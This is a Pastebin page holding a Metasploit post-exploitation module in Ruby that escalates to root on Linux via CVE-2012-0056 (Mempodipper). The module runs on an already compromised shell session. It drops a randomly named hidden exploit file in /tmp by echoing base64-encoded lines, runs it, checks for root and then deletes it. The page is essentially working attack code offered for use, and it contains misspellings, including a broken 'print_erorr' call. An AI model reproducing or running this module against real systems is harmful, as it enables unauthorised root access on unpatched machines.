Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # $Id$
- ##
- ##
- # This file is part of the Metasploit Framework and may be subject to
- # redistribution and commercial restrictions. Please see the Metasploit
- # Framework web site for more information on licensing and terms of use.
- # http://metasploit.com/framework/
- ##
- require 'msf/core'
- require 'rex'
- require 'msf/core/post/common'
- require 'msf/core/post/file'
- require 'msf/core/post/linux/priv'
- require 'msf/core/post/linux/system'
- class Metasploit3 < Msf::Post
- include Msf::Post::Common
- include Msf::Post::File
- include Msf::Post::Linux::Priv
- include Msf::Post::Linux::System
- def initialize(info={})
- super( update_info( info,
- 'Name' => 'Exploit CVE-2012-0056 to get root',
- 'Description' => %q{ This module try elevate your privilages by exploitng CVE-2012-0056},
- 'License' => MSF_LICENSE,
- 'Author' => [ 'mak' ],
- 'Version' => '$Revision$',
- 'Platform' => [ 'linux' ],
- 'SessionTypes' => [ 'shell' ], ## no mete for now?
- ))
- end
- def run
- print_status("Using cve-2012-56 to elevete privs on session #{session.inspect}...")
- if is_root?
- print_status "Already root, so no need to upgrade permissions. Aborting."
- return
- end
- objdump_bin = cmd_exec("which objdump")
- ruby_bin = cmd_exec("which ruby")
- if [objdump_bin,ruby_bin].any? {|x| x.empty?}
- print_erorr "This exploit is usless without etiher objdump or ruby on owned machine"
- return
- end
- sploit_file = "/tmp/." + Rex::Text.rand_text_alpha(8) + '.rb'
- print_status "Coping exploit to #{sploit_file} it may take a while"
- begin
- ::Timeout.timeout(240) do
- generate_exploit().split("\n").each do |l|
- l = Rex::Text.encode_base64(l)
- cmd_exec("echo #{l} | base64 -d >> #{sploit_file} ; echo '' >> #{sploit_file}")
- end
- print_status "Lunching exploit..."
- cmd_exec("ruby #{sploit_file}")
- end
- rescue ::Timeout::Error
- print_error "mempodipper: failed du to timeout"
- rescue
- print_error "mempodipper failed. Check the session log."
- end
- if is_root?
- print_good "Got root. Nice."
- else
- print_error "Sorry Mempodipper faild."
- end
- cmd_exec "rm #{sploit_file}"
- end
- def generate_exploit
- file = ::File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-0056.rb")
- met = ::File.open(file, "rb") {|f|
- f.read(f.stat.size)
- }
- return met
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement